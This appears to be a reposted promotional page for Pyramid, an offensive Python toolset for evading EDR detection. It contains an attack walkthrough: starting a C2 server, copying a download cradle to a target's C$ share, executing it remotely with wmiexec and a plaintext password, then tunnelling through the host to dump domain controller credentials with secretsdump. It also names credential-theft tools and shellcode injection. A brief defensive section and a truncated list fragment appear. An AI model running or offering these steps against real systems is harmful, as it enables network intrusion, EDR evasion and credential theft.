Pyramid – A Tool To Help Operate In EDRs’ Blind Spots

What is it

Pyramid is a set of Python scripts and module dependencies that can be used to evade EDRs. The main purpose of the tool is to perform offensive tasks by leveraging some Python evasion properties and looking as a legit Python application usage. This can be achieved because:

  1. the

    The attack transcript is reported below:

    Start Pyramid Server:

    python3 PyramidHTTP.py 443 testuser Sup3rP4ss! /home/nak/projects/dev/Proxy/Pyramid/key.pem /home/nak/projects/dev/Proxy/Pyramid/cert.pem /home/nak/projects/dev/Proxy/Pyramid/Server/

    Save the base download cradle to cradle.py.

    Copy unpacked windows Embeddable Package (with cradle.py) to target:

    smbclient //192.168.1.11/C$ -U domain/user -c 'prompt OFF; recurse ON; lcd /home/user/Downloads/python-3.10.4-embed-amd64; cd UsersPublic; mkdir python-3.10.4-embed-amd64; cd python-3.10.4-embed-amd64; mput *'

    Execute pythonw.exe to launch the cradle:

    /usr/share/doc/python3-impacket/examples/wmiexec.py domain/user:"Password1!"@192.168.1.11 'C:UsersPublicpython-3.10.4-embed-amd64pythonw.exe C:UsersPublicpython-3.10.4-embed-amd64cradle.py'

    Socks5 server is running on target and SSH tunnel should be up, so modify proxychains.conf and tunnel traffic through target:

    proxychains impacket-secretsdump domain/user:"Password1!"@192.168.1.50 -just-dc

    Limitations

    Dynamically loading Python modules does not natively support importing *.pyd files that are essentially dlls. The only public solution to my knowledge that solves this problem is provided by Scythe *(in-memory-execution) by re-engineering the CPython interpreter. In ordrer not to lose the digital signature, one solution that would allow using the native Python embeddable package involves dropping on disk the required pyd files or wheels. This should not have significant OPSEC implications in most cases, however bear in mind that the following wheels containing pyd files are dropped on disk to allow Dinamic loading to complete: *. Cryptodome – needed by Bloodhound-Python, Impacket, DonPAPI and LaZagne *. bcrypt, cryptography, nacl, cffi – needed by paramiko

    • please note that running BOFs does not need dropping any pyd on disk since this techniques only involves shellcode injection.

    How to defend from this technique

    Python.exe is a signed binary with good reputation and does not provide visibility on Python dynamic code. Pyramid exploits these evasion properties carrying out offensive tasks from within the same python.exe process.

    For this reason, one of the most efficient solution would be to block by default binaries and dlls signed by Python Foundation, creating exceptions only for users that actually need to use python binaries.

    Alerts on downloads of embeddable packages can also be raised.

    Deploying PEP-578 is also feasible although complex, this is a sample implementation. However, deploying PEP-578 without blocking the usage of stock python binaries could make this countermeasure useless.

    Download Pyramid

If you like the site, please consider joining the telegram channel or supporting us on Patreon using the button below.

Discord

Original Source